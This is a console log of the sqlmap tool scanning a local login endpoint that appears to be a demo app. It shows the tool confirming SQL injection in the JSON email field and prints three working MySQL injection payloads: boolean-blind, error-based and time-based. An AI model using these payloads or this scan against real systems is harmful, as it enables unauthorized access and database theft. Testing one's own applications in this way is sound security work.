        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.10.6#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:14:02 /2026-07-07/

[1/1] URL:
GET http://127.0.0.1:4000/api/auth/demo/raw-login
POST data: {"email":"admin@example.com","password":"wrong-password"}
do you want to test this URL? [Y/n/q]
> Y
[22:14:02] [INFO] testing URL 'http://127.0.0.1:4000/api/auth/demo/raw-login'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[22:14:02] [INFO] using '/Users/vlada/.local/share/sqlmap/output/results-07072026_1014pm.csv' as the CSV results file in multiple targets mode
[22:14:02] [INFO] testing connection to the target URL
[22:14:02] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:14:02] [INFO] testing if the target URL content is stable
[22:14:03] [INFO] target URL content is stable
[22:14:03] [INFO] heuristic (basic) test shows that (custom) POST parameter 'JSON email' might be injectable (possible DBMS: 'MySQL')
[22:14:03] [INFO] testing for SQL injection on (custom) POST parameter 'JSON email'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] Y
[22:14:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:14:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[22:14:03] [INFO] (custom) POST parameter 'JSON email' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --code=401)
[22:14:03] [INFO] testing 'Generic inline queries'
[22:14:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:14:03] [WARNING] reflective value(s) found and filtering out
[22:14:03] [INFO] (custom) POST parameter 'JSON email' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[22:14:03] [INFO] testing 'MySQL inline queries'
[22:14:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:14:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:14:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:14:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:14:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:14:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:14:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:14:05] [INFO] (custom) POST parameter 'JSON email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[22:14:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:14:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:14:05] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:14:05] [INFO] target URL appears to have 5 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[22:14:05] [INFO] target URL appears to be UNION injectable with 5 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[22:14:06] [INFO] testing 'Generic UNION query (60) - 21 to 40 columns'
[22:14:06] [INFO] testing 'MySQL UNION query (60) - 1 to 20 columns'
[22:14:06] [INFO] testing 'MySQL UNION query (60) - 21 to 40 columns'
[22:14:06] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[22:14:06] [INFO] testing 'MySQL UNION query (60) - 61 to 80 columns'
[22:14:06] [INFO] testing 'MySQL UNION query (60) - 81 to 100 columns'
(custom) POST parameter 'JSON email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 295 HTTP(s) requests:
---
Parameter: JSON email ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: {"email":"admin@example.com' AND 7866=(SELECT (CASE WHEN (7866=7866) THEN 7866 ELSE (SELECT 2647 UNION SELECT 2972) END))-- -","password":"wrong-password"}

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: {"email":"admin@example.com' AND EXTRACTVALUE(4411,CONCAT(0x5c,0x71707a6271,(SELECT (ELT(4411=4411,1))),0x7170716a71)) AND 'XCbL'='XCbL","password":"wrong-password"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"email":"admin@example.com' AND (SELECT 6632 FROM (SELECT(SLEEP(1)))SJKB) AND 'kmiQ'='kmiQ","password":"wrong-password"}
---
do you want to exploit this SQL injection? [Y/n] Y
[22:14:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[22:14:06] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 138 times, 500 (Internal Server Error) - 171 times
[22:14:06] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/Users/vlada/.local/share/sqlmap/output/results-07072026_1014pm.csv'

[*] ending @ 22:14:06 /2026-07-07/

